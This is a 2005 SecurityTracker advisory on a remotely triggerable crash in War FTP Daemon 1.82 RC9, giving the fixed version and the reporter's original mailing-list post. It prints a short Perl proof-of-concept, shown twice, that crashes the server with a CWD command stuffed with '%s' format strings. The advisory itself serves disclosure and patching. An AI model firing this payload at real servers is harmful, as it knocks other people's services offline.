SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (File Transfer/Sharing)  >  War-FTP Vendors:  Jgaa (jgaa.com)
War FTP Daemon Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1013023
SecurityTracker URL:  http://securitytracker.com/id?1013023
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Nessus Reference:  16270   (Links to External Site)
Updated:  Jan 28 2005
Original Entry Date:  Jan 28 2005
Impact:  Denial of service via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): 1.82.00-RC9 and prior versions
Description:  A vulnerability was reported in War FTP Daemon in the processing of certain commands. A remote user can cause the FTP service to crash.

MC.Iglo reported that a remote authenticated user can supply specially crafted CWD commands to cause the FTP service to crash.

A demonstration exploit is provided:

#!/usr/bin/perl -w
# remote DoS PoC Exploit for WarFTPD 1.82 RC9
# THX 2 barabas 4 his GoldenFTP-sploit :)
# greetings fly out to Foobar

use strict;
use Net::FTP;
my $payload="%s"x115;

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("anonymous","123@123.com");
$ftp->quot("CWD",$payload);

class101 from hat-squad.com noted that the USER command is also affected, so no authentication is required to exploit this flaw.
Impact:  A remote user can cause the FTP service to crash.
Solution:  The vendor has released a fixed version (1.82.00-RC10), available at:

http://support.jgaa.com/index.php?MenuPage=download
Vendor URL:  support.jgaa.com/index.php?cmd=ShowReport&ID=02643 (Links to External Site)
Cause:  Exception handling error
Underlying OS:  Windows (Any)
Reported By:  "MC.Iglo" <mc.iglo@gmx.de>
Message History:   None.

 Source Message Contents
Date:  Thu, 27 Jan 2005 12:14:51 +0100
From:  "MC.Iglo" <mc.iglo@gmx.de>
Subject:  WarFTPD 1.82 RC9 DoS

 

Hello,

due to an access violation, specialy crafted CWD-Commands will exit
the FTP server when running as a NT service.
User needs to be logged on.

Vendor's report can be found at
http://support.jgaa.com/index.php?cmd=ShowReport&ID=02643

Solution: deny anonymous or untrusted logins or use patched version.

Updated Version can be found at
http://support.jgaa.com/index.php?cmd=ShowProduct&ID=3


PoC Exploit

<snip>

#!/usr/bin/perl -w
# remote DoS PoC Exploit for WarFTPD 1.82 RC9
# THX 2 barabas 4 his GoldenFTP-sploit :)
# greetings fly out to Foobar

use strict;
use Net::FTP;
my $payload="%s"x115;

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("anonymous","123@123.com");
$ftp->quot("CWD",$payload);

</snip>


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC